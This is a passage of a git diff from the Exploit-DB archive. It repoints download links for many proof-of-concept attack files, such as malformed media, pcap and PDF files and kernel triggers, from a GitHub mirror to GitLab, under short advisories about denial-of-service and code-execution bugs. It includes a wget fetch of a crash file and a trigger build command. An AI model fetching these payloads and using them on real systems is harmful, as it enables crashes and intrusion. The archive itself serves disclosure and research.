+https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30024.jpg \ No newline at end of file diff --git a/exploits/linux/dos/30648.txt b/exploits/linux/dos/30648.txt index fd46f5bc7..18fc99ce3 100644 --- a/exploits/linux/dos/30648.txt +++ b/exploits/linux/dos/30648.txt @@ -6,4 +6,4 @@ Exploiting this issue allows attackers to execute arbitrary machine code in the This issue affects versions prior to AlsaPlayer 0.99.80-rc3. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30648.ogg \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30648.ogg \ No newline at end of file diff --git a/exploits/linux/dos/30776.txt b/exploits/linux/dos/30776.txt index 5ae033792..37848bab4 100644 --- a/exploits/linux/dos/30776.txt +++ b/exploits/linux/dos/30776.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to crash the application, resulting in denial-o LIVE555 Media Server 2007.11.01 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30776.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30776.zip \ No newline at end of file diff --git a/exploits/linux/dos/30837.txt b/exploits/linux/dos/30837.txt index 6de8f9ed4..68f6282d5 100644 --- a/exploits/linux/dos/30837.txt +++ b/exploits/linux/dos/30837.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to cause denial-of-service conditions. Given th QEMU 0.9.0 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30837.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30837.rar \ No newline at end of file diff --git a/exploits/linux/dos/30894.txt b/exploits/linux/dos/30894.txt index ef7c0fe96..58c9cf91b 100644 --- a/exploits/linux/dos/30894.txt +++ b/exploits/linux/dos/30894.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues will allow an attacker to execute arbitrary These issues affect PeerCast 0.12.17, SVN 334 and prior versions. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30894.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30894.zip \ No newline at end of file diff --git a/exploits/linux/dos/31018.txt b/exploits/linux/dos/31018.txt index 2a00bbd26..1a951770c 100644 --- a/exploits/linux/dos/31018.txt +++ b/exploits/linux/dos/31018.txt @@ -6,7 +6,7 @@ Successfully exploiting this issue allows remote attackers to deny service to le These issues affect GStreamer 0.10.15; other versions may also be vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31018-1.mpg -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31018-2.mpg -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31018-3.m2v -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31018-4.m2v \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31018-1.mpg +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31018-2.mpg +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31018-3.m2v +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31018-4.m2v \ No newline at end of file diff --git a/exploits/linux/dos/31054.txt b/exploits/linux/dos/31054.txt index a19cac1f8..2db784029 100644 --- a/exploits/linux/dos/31054.txt +++ b/exploits/linux/dos/31054.txt @@ -6,4 +6,4 @@ Attackers can leverage this issue to execute arbitrary code in the context of an Versions prior to SDL_image 1.2.7 are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31054.gif \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31054.gif \ No newline at end of file diff --git a/exploits/linux/dos/31218.txt b/exploits/linux/dos/31218.txt index 6de2a81a9..ecd9d7216 100644 --- a/exploits/linux/dos/31218.txt +++ b/exploits/linux/dos/31218.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote attackers to crash the affected This issue affects freeSSHd 1.2.0 and prior versions. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31218.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31218.zip \ No newline at end of file diff --git a/exploits/linux/dos/31552.txt b/exploits/linux/dos/31552.txt index 1f1aa04cf..d0df01a29 100644 --- a/exploits/linux/dos/31552.txt +++ b/exploits/linux/dos/31552.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to cause crashes and deny service to These issues affect Wireshark 0.99.2 up to and including 0.99.8. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31552.pcap \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31552.pcap \ No newline at end of file diff --git a/exploits/linux/dos/31553.txt b/exploits/linux/dos/31553.txt index 30f61c3fa..0344bac51 100644 --- a/exploits/linux/dos/31553.txt +++ b/exploits/linux/dos/31553.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to cause crashes and deny service to These issues affect Wireshark 0.99.2 up to and including 0.99.8. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31553.pcap \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31553.pcap \ No newline at end of file diff --git a/exploits/linux/dos/31554.txt b/exploits/linux/dos/31554.txt index 88ccdf7d0..a2ec25334 100644 --- a/exploits/linux/dos/31554.txt +++ b/exploits/linux/dos/31554.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to cause crashes and deny service to These issues affect Wireshark 0.99.2 up to and including 0.99.8. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31554.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31554.gz \ No newline at end of file diff --git a/exploits/linux/dos/31984.txt b/exploits/linux/dos/31984.txt index 47f48ee69..3eb7f1e7e 100644 --- a/exploits/linux/dos/31984.txt +++ b/exploits/linux/dos/31984.txt @@ -6,4 +6,4 @@ Successful exploits can allow attackers to crash the affected browser, resulting This issue affects Firefox 3 running on Ubuntu Linux 8.04; other versions running on different platforms may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31984.jpg \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31984.jpg \ No newline at end of file diff --git a/exploits/linux/dos/32018.txt b/exploits/linux/dos/32018.txt index e561248bf..2588a686b 100644 --- a/exploits/linux/dos/32018.txt +++ b/exploits/linux/dos/32018.txt @@ -6,4 +6,4 @@ This issue arises when the software handles maliciously crafted SVG images. According to reports, the latest versions of Firefox, Evince, EoG, and GIMP are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32018.svg \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32018.svg \ No newline at end of file diff --git a/exploits/linux/dos/32019.txt b/exploits/linux/dos/32019.txt index a65d781dd..ad780c47a 100644 --- a/exploits/linux/dos/32019.txt +++ b/exploits/linux/dos/32019.txt @@ -6,4 +6,4 @@ Remote attackers can exploit this issue by enticing victims into opening malicio Successful exploits may allow attackers to execute arbitrary code within the context of an affected application. Failed exploit attempts will likely result in a denial of service. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32019.iki \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32019.iki \ No newline at end of file diff --git a/exploits/linux/dos/32452.txt b/exploits/linux/dos/32452.txt index 94f36a01a..889c1860e 100644 --- a/exploits/linux/dos/32452.txt +++ b/exploits/linux/dos/32452.txt @@ -17,4 +17,4 @@ UPDATE (September 4, 2009): Mac OS X 10.6 reportedly ships with Flash Player 10. UPDATE (June 10, 2010): Flash Player 10.1.53.64 and 9.0.227.0 are available. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32452.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32452.zip \ No newline at end of file diff --git a/exploits/linux/dos/32740.txt b/exploits/linux/dos/32740.txt index 8c7cc261f..901c412fb 100644 --- a/exploits/linux/dos/32740.txt +++ b/exploits/linux/dos/32740.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to cause a kernel panic, denying service to leg QNX RTOS 6.4.0 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32740.bin \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32740.bin \ No newline at end of file diff --git a/exploits/linux/dos/32775.txt b/exploits/linux/dos/32775.txt index b529f0d7e..8e50fffb6 100644 --- a/exploits/linux/dos/32775.txt +++ b/exploits/linux/dos/32775.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to cause the kernel to crash, denying service t This issue affects versions prior to Linux kernel 2.6.27.14. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32775.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32775.gz \ No newline at end of file diff --git a/exploits/linux/dos/32800.txt b/exploits/linux/dos/32800.txt index 8da728a13..254451f02 100644 --- a/exploits/linux/dos/32800.txt +++ b/exploits/linux/dos/32800.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote attackers to crash applications These issues affect versions prior to Poppler 0.10.4. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32800.pdf \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32800.pdf \ No newline at end of file diff --git a/exploits/linux/dos/32856.txt b/exploits/linux/dos/32856.txt index 9f00ae96f..5ba39f172 100644 --- a/exploits/linux/dos/32856.txt +++ b/exploits/linux/dos/32856.txt @@ -4,4 +4,4 @@ MPlayer is prone to multiple denial-of-service vulnerabilities when handling mal Successfully exploiting this issue allows remote attackers to deny service to legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32856.aac \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32856.aac \ No newline at end of file diff --git a/exploits/linux/dos/32857.txt b/exploits/linux/dos/32857.txt index 2d596aef1..2565b4c2f 100644 --- a/exploits/linux/dos/32857.txt +++ b/exploits/linux/dos/32857.txt @@ -4,4 +4,4 @@ MPlayer is prone to multiple denial-of-service vulnerabilities when handling mal Successfully exploiting this issue allows remote attackers to deny service to legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32857.ogm \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32857.ogm \ No newline at end of file diff --git a/exploits/linux/dos/33017.txt b/exploits/linux/dos/33017.txt index a22b3b65c..646af211f 100644 --- a/exploits/linux/dos/33017.txt +++ b/exploits/linux/dos/33017.txt @@ -8,4 +8,4 @@ Acrobat 9.1.1 is vulnerable; other versions may also be affected. NOTE: This BID was previously classified as a buffer-overflow issue, but further analysis reveals that it is a stack-exhaustion issue. Code execution is unlikely. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33017.pdf \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33017.pdf \ No newline at end of file diff --git a/exploits/linux/dos/33049.txt b/exploits/linux/dos/33049.txt index 53f86fd8c..e676451e6 100644 --- a/exploits/linux/dos/33049.txt +++ b/exploits/linux/dos/33049.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary malicious code in the co LibTIFF 3.8.2 is vulnerable; other versions may be affected as well. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33049.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33049.zip \ No newline at end of file diff --git a/exploits/linux/dos/33088.txt b/exploits/linux/dos/33088.txt index e46bdcf43..b253e12c9 100644 --- a/exploits/linux/dos/33088.txt +++ b/exploits/linux/dos/33088.txt @@ -6,5 +6,5 @@ A local attacker can exploit this issue to execute arbitrary code with superuser This issue was introduced in Linux kernel 2.6.30. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33088-1.tgz -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33088-2.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33088-1.tgz +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33088-2.tgz \ No newline at end of file diff --git a/exploits/linux/dos/33101.txt b/exploits/linux/dos/33101.txt index 11cde8d1b..e97e6f3e1 100644 --- a/exploits/linux/dos/33101.txt +++ b/exploits/linux/dos/33101.txt @@ -6,4 +6,4 @@ The vulnerability is fixed in Firefox 3.0.12 and 3.5. Note that Thunderbird is a This vulnerability was previously covered in BID 35758 (Mozilla Firefox MFSA 2009-34, -35, -36, -37, -39, -40 Multiple Vulnerabilities) but has been assigned its own record to better document the issue. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33101.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33101.zip \ No newline at end of file diff --git a/exploits/linux/dos/33134.txt b/exploits/linux/dos/33134.txt index dcae23510..823392759 100644 --- a/exploits/linux/dos/33134.txt +++ b/exploits/linux/dos/33134.txt @@ -13,4 +13,4 @@ This issue affects versions *prior to* the following: Flash Player 10.0.32.18 AIR 1.5.2 -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33134.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33134.zip \ No newline at end of file diff --git a/exploits/linux/dos/33222.txt b/exploits/linux/dos/33222.txt index e4debf6d1..05e5fd4cd 100644 --- a/exploits/linux/dos/33222.txt +++ b/exploits/linux/dos/33222.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to crash the application and deny se These issues affect Wireshark 0.99.6 through 1.2.1. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33222.pcap \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33222.pcap \ No newline at end of file diff --git a/exploits/linux/dos/33223.txt b/exploits/linux/dos/33223.txt index a337e9829..957096b95 100644 --- a/exploits/linux/dos/33223.txt +++ b/exploits/linux/dos/33223.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to crash the application and deny se These issues affect Wireshark 0.99.6 through 1.2.1. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33223.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33223.zip \ No newline at end of file diff --git a/exploits/linux/dos/33224.txt b/exploits/linux/dos/33224.txt index 9b45a52e8..be07ebccc 100644 --- a/exploits/linux/dos/33224.txt +++ b/exploits/linux/dos/33224.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow attackers to crash the application and deny se These issues affect Wireshark 0.99.6 through 1.2.1. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33224.pcap \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33224.pcap \ No newline at end of file diff --git a/exploits/linux/dos/33228.txt b/exploits/linux/dos/33228.txt index 9891d7db5..c3b31f8da 100644 --- a/exploits/linux/dos/33228.txt +++ b/exploits/linux/dos/33228.txt @@ -6,4 +6,4 @@ Local attackers may be able to exploit this issue to run arbitrary code with ele The Linux Kernel 2.6.31-rc1 through 2.6.31 are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33228.tgz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33228.tgz \ No newline at end of file diff --git a/exploits/linux/dos/33233.txt b/exploits/linux/dos/33233.txt index dbca23873..effa02aab 100644 --- a/exploits/linux/dos/33233.txt +++ b/exploits/linux/dos/33233.txt @@ -6,5 +6,5 @@ Attackers may leverage these issues to execute arbitrary code in the context of FFmpeg 0.5 is affected; other versions may also be vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33233-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33233-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33233-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33233-2.zip \ No newline at end of file diff --git a/exploits/linux/dos/33283.txt b/exploits/linux/dos/33283.txt index f835e4682..7fa2340ae 100644 --- a/exploits/linux/dos/33283.txt +++ b/exploits/linux/dos/33283.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue by supplying a malicious PDF file or webpage. This issue was previously covered in BID 36638 (Adobe Reader and Acrobat October 2009 Multiple Remote Vulnerabilities), but has been given its own record to better document it. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33283.tar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33283.tar \ No newline at end of file diff --git a/exploits/linux/dos/33524.txt b/exploits/linux/dos/33524.txt index 8dfe23f4b..0e63fda58 100644 --- a/exploits/linux/dos/33524.txt +++ b/exploits/linux/dos/33524.txt @@ -9,4 +9,4 @@ Successful exploits will cause the application to crash, denying service to legi OpenOffice 3.1.0 and 3.1.1 on Microsoft Windows are affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33524.rar \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33524.rar \ No newline at end of file diff --git a/exploits/linux/dos/33549.txt b/exploits/linux/dos/33549.txt index 5cb5e68bd..203834382 100644 --- a/exploits/linux/dos/33549.txt +++ b/exploits/linux/dos/33549.txt @@ -8,4 +8,4 @@ Successful exploits will cause the application to crash, denying service to legi OpenOffice 3.1.0 and 3.1.1 are vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33549.slk \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33549.slk \ No newline at end of file diff --git a/exploits/linux/dos/34228.txt b/exploits/linux/dos/34228.txt index 59dbbcd3e..3e0026b12 100644 --- a/exploits/linux/dos/34228.txt +++ b/exploits/linux/dos/34228.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to crash the affected application, denying serv Mumble versions 1.2.2 and prior are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34228.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34228.zip \ No newline at end of file diff --git a/exploits/linux/dos/34249.txt b/exploits/linux/dos/34249.txt index 792b561c6..bc8957d8f 100644 --- a/exploits/linux/dos/34249.txt +++ b/exploits/linux/dos/34249.txt @@ -6,4 +6,4 @@ An attacker can exploit these issues to cause the applications to become unrespo Freeciv 2.2.1 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34249.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34249.zip \ No newline at end of file diff --git a/exploits/linux/dos/34278.txt b/exploits/linux/dos/34278.txt index 0948c5639..0cb37a32b 100644 --- a/exploits/linux/dos/34278.txt +++ b/exploits/linux/dos/34278.txt @@ -4,4 +4,4 @@ LibTIFF is prone to a denial-of-service vulnerability because it fails to proper An attacker can exploit this issue to crash an application that uses the vulnerable library, denying service to legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34278.tif \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34278.tif \ No newline at end of file diff --git a/exploits/linux/dos/34279.txt b/exploits/linux/dos/34279.txt index 8d1c0e311..502c17c2e 100644 --- a/exploits/linux/dos/34279.txt +++ b/exploits/linux/dos/34279.txt @@ -4,4 +4,4 @@ LibTIFF is prone to a denial-of-service vulnerability because it fails to proper An attacker can exploit this issue to crash an application that uses the vulnerable library, denying service to legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34279.tif \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34279.tif \ No newline at end of file diff --git a/exploits/linux/dos/34427.txt b/exploits/linux/dos/34427.txt index 9f78321af..61a9b6496 100644 --- a/exploits/linux/dos/34427.txt +++ b/exploits/linux/dos/34427.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue may allow an attacker to execute arbitrary co The issue affects OpenSSL 1.0.0a; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34427.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34427.zip \ No newline at end of file diff --git a/exploits/linux/dos/34953.txt b/exploits/linux/dos/34953.txt index 72a7386c4..671743342 100644 --- a/exploits/linux/dos/34953.txt +++ b/exploits/linux/dos/34953.txt @@ -5,7 +5,7 @@ FUSE fusermount tool is prone to a race-condition vulnerability. A local attacker can exploit this issue to cause a denial of service by unmounting any filesystem of the system. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34953.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/34953.zip diff --git a/exploits/linux/dos/35081.txt b/exploits/linux/dos/35081.txt index 8577317fb..df8e86e43 100644 --- a/exploits/linux/dos/35081.txt +++ b/exploits/linux/dos/35081.txt @@ -23,7 +23,7 @@ out-of-bounds crashes due to very limited range checking. In binutils $ wget http://lcamtuf.coredump.cx/strings-bfd-badptr2 -Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35081.bin +Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35081.bin ... $ strings strings-bfd-badptr2 diff --git a/exploits/linux/dos/35173.txt b/exploits/linux/dos/35173.txt index 6d72627f7..71674a047 100644 --- a/exploits/linux/dos/35173.txt +++ b/exploits/linux/dos/35173.txt @@ -7,7 +7,7 @@ Attached three PoCs (malformed ELFs) and a screenshot of the panic. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35173.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35173.zip ---- diff --git a/exploits/linux/dos/35432.txt b/exploits/linux/dos/35432.txt index a147c413e..eb7c5a124 100644 --- a/exploits/linux/dos/35432.txt +++ b/exploits/linux/dos/35432.txt @@ -4,4 +4,4 @@ Wireshark is prone to a remote denial-of-service vulnerability caused by a NULL- An attacker can exploit this issue to crash the application, resulting in a denial-of-service condition. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/35432.pcap \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35432.pcap \ No newline at end of file diff --git a/exploits/linux/dos/36633.txt b/exploits/linux/dos/36633.txt index c36239edb..bc1ccdb4c 100644 --- a/exploits/linux/dos/36633.txt +++ b/exploits/linux/dos/36633.txt @@ -6,4 +6,4 @@ Remote attackers can exploit these issues to execute arbitrary code in the conte Wireshark versions 1.4.0 through 1.4.10 and 1.6.0 through 1.6.4 are vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36633.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36633.zip \ No newline at end of file diff --git a/exploits/linux/dos/36669.txt b/exploits/linux/dos/36669.txt index 7b45532ff..27a17dcad 100644 --- a/exploits/linux/dos/36669.txt +++ b/exploits/linux/dos/36669.txt @@ -4,4 +4,4 @@ Apache APR is prone to a denial-of-service vulnerability. An attacker can exploit this issue by sending specially crafted forms in HTTP POST requests. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/36669.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/36669.zip \ No newline at end of file diff --git a/exploits/linux/dos/37839.txt b/exploits/linux/dos/37839.txt index 058a9a378..9e7dc20ea 100644 --- a/exploits/linux/dos/37839.txt +++ b/exploits/linux/dos/37839.txt @@ -60,4 +60,4 @@ In this case, the insertion of the OP_BRAZERO has resulted in the expected OP_CB See attached for a crash PoC for the latest Chrome/Flash on x64 linux. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37839.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37839.zip \ No newline at end of file diff --git a/exploits/linux/dos/37866.txt b/exploits/linux/dos/37866.txt index 6da16fd42..3a0e00227 100644 --- a/exploits/linux/dos/37866.txt +++ b/exploits/linux/dos/37866.txt @@ -33,4 +33,4 @@ If we trace through the usages of %rax, we can get to some bad writes pretty eas 0x00007f69314b882f: mov %edx,0x10(%rdi) <---- rdi written to Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37866.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37866.zip \ No newline at end of file diff --git a/exploits/linux/dos/37867.txt b/exploits/linux/dos/37867.txt index b580714dc..528742a97 100644 --- a/exploits/linux/dos/37867.txt +++ b/exploits/linux/dos/37867.txt @@ -18,4 +18,4 @@ rax 0x7ff8000000000000 9221120237041090560 And if we look back in the assembly a bit, the wild value has come from %rbx that points to a block of wild values. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37867.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37867.zip \ No newline at end of file diff --git a/exploits/linux/dos/37869.txt b/exploits/linux/dos/37869.txt index ad23fc4e7..708fc2012 100644 --- a/exploits/linux/dos/37869.txt +++ b/exploits/linux/dos/37869.txt @@ -8,4 +8,4 @@ rcx 0x3102ffffecfd 53888954658045 The base sample from which this fuzz case was generated is also attached. We believe this may be related to button handling. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37869.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37869.zip \ No newline at end of file diff --git a/exploits/linux/dos/37870.txt b/exploits/linux/dos/37870.txt index 95074a0f2..c1be564d1 100644 --- a/exploits/linux/dos/37870.txt +++ b/exploits/linux/dos/37870.txt @@ -21,4 +21,4 @@ The wider context shows that the wild pointer target can be incremented with thi The base sample from which this fuzz case was generated is also attached, e3f87b25c25db8f9ec3c975f8c1211cc.swf Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37870.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37870.zip \ No newline at end of file diff --git a/exploits/linux/dos/38620.txt b/exploits/linux/dos/38620.txt index b180c2be8..4f4b07ef1 100644 --- a/exploits/linux/dos/38620.txt +++ b/exploits/linux/dos/38620.txt @@ -79,4 +79,4 @@ The other crashes occur at freetype2/src/sfnt/ttcmap.c:3012:29. The issue was reported in https://savannah.nongnu.org/bugs/index.php?46346. Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38620.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38620.zip \ No newline at end of file diff --git a/exploits/linux/dos/38778.txt b/exploits/linux/dos/38778.txt index f66623a72..8f34643da 100644 --- a/exploits/linux/dos/38778.txt +++ b/exploits/linux/dos/38778.txt @@ -4,4 +4,4 @@ Blue Coat ProxySG and Security Gateway OS are prone to a denial-of-service vulne Successful exploits may allow an attacker to consume excessive resources, denying service to legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/thc-ssl-dos-1.4.tar.gz \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/thc-ssl-dos-1.4.tar.gz \ No newline at end of file diff --git a/exploits/linux/dos/39229.cpp b/exploits/linux/dos/39229.cpp index 1e98fb0b6..090b93ac4 100644 --- a/exploits/linux/dos/39229.cpp +++ b/exploits/linux/dos/39229.cpp @@ -54,7 +54,7 @@ using namespace std; * $ g++ -I/usr/include/gdcm-2.6 -o CVE-2015-8396-trigger CVE-2015-8396-trigger.cpp -lgdcmCommon -lgdcmMSFF -lgdcmDSED * * Try it on http://census-labs.com/media/CVE-2015-8396.dcm.bz2 - * https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39229.zip + * https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39229.zip * $ bzip2 -d CVE-2015-8396.dcm.bz2 * $ ./CVE-2015-8396-trigger 